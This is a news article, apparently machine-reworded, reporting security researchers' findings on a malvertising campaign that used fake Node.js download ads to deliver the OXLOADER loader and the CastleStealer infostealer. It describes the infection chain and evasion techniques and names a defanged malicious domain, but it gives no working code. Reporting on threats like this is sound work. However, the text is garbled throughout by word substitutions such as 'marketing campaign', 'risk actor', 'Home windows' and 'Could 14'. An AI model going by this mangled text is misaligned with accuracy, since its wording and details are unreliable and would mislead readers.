Cybersecurity researchers have disclosed particulars of a brand new marketing campaign that delivers CastleStealer by the use of a beforehand unreported malware loader dubbed OXLOADER.
Based on Elastic Safety Labs, the marketing campaign leverages malicious Google Adverts as a place to begin to distribute the malware. Proof signifies that the risk actor is probably going Russian-speaking and financially motivated, owing to the presence of express exclusions to stop infecting machines positioned within the Commonwealth of Impartial States (CIS) area. The marketing campaign has been codenamed REF8372.
“The loader makes use of a number of obfuscation layers (control-flow flattening, opaque predicates, blended Boolean-Arithmetic), self-modifying decryption stubs, and abuses the Home windows .reloc part to stage shellcode,” researchers Daniel Stepanic and Jia Yu Chan mentioned in a technical breakdown.
The assault begins when unsuspecting customers enter queries akin to “lts model of node.js” on engines like google like Google, redirecting them to a pretend web site (“node-js[.]prentiva99[.]information”) surfaced by way of bogus adverts revealed below the verified title “ВОЛОДИМИР ТЕРЕЩЕНКО” that is purportedly primarily based in Ukraine.
It is at present unknown if the advertiser account is linked to the precise risk actor, or if it is a entrance account or a bought identification. The advertiser account, together with its advert campaigns, was faraway from Google on Could 14, 2026.
Customers who find yourself interacting with the positioning are served a batch script hosted on Storj, a decentralized, open-source cloud storage platform. The abuse of Storj as soon as once more illustrates how risk actors proceed to leverage reputable companies to evade domain-based repute filters.
Working the batch script shows a bogus set up wizard consumer interface (UI), whereas stealthily downloading a next-stage payload, a Storj-hosted executable dubbed OXLOADER via a PowerShell command and executing it with -Verb RunAs to set off a Home windows Person Account Management (UAC) immediate.
The assault then employs DLL side-loading to launch a rogue DLL, which then proceeds to decrypt and execute the CastleStealer payload. OXLOADER additionally makes use of methods like control-flow flattening (CFF) and blended Boolean-Arithmetic (MBA) to evade static detection, whereas additionally taking steps to make sure it is not run on sandboxed environments.
CastleStealer is a .NET data stealer that was lately distributed alongside CastleLoader via a ClickFix-style lure masquerading as a free image-editing instrument as a part of a marketing campaign codenamed BackgroundFix. CastleLoader is attributed to a risk exercise cluster often known as GrayBravo.
“OXLOADER is in an early operational section, however the engineering behind it suggests this household is value watching,” Elastic mentioned. “The code obfuscation, anti-VM measures, benign-looking code used to masquerade its binaries, and distinctive staging methods replicate deliberate engineering selections to evade evaluation.”
“That funding is paying off, leading to low detection charges throughout static engines and detonation runs, giving OXLOADER a window to function earlier than it will get hunted down.”
